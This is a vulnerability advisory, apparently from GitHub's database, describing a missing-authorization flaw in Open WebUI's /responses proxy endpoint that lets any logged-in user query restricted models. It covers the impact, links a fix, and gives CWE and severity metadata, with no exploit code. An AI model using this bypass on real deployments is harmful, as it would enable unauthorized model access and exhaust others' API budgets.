The /responses endpoint in the OpenAI router accepts any authenticated user and forwards requests directly to upstream LLM providers without enforcing per-model access control. While the primary chat completion endpoint (generatechatcompletion) checks model ownership, group membership, and AccessGrants before allowing a request, the /responses proxy only validates that the user has a valid session via getverifieduser.
This allows any authenticated user — regardless of role or group assignment — to interact with any model configured on the instance by sending a POST request to /api/openai/responses with an arbitrary model ID.
As per OWASP TOP 10 LLM:
Model Denial of Service (OWASP LLM04): An unauthorized user can submit resource-intensive requests to expensive models (e.g., o1-pro, GPT-4o) that were explicitly restricted by the administrator. In shared deployments, this can exhaust API budgets or rate limits, causing total service disruption for all legitimate users.
Model Theft (OWASP LLM10): If the instance proxies access to fine-tuned or self-hosted models, unauthorized users can freely interact with them, enabling capability extraction or model distillation without authorization.
Access Policy Bypass: Administrators lose the ability to enforce cost-tier restrictions, team-based model assignments, or compliance boundaries through the existing access control system.
The endpoint is a raw passthrough proxy and does not resolve workspace model configurations (system prompts, knowledge bases, RAG pipelines). Therefore, workspace-specific confidential data is not directly exposed through this vector.
PR: https://github.com/open-webui/open-webui/pull/23481
{
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T19:45:53Z",
"cwe_ids": [
"CWE-284",
"CWE-862"
],
"severity": "HIGH",
"nvd_published_at": null
}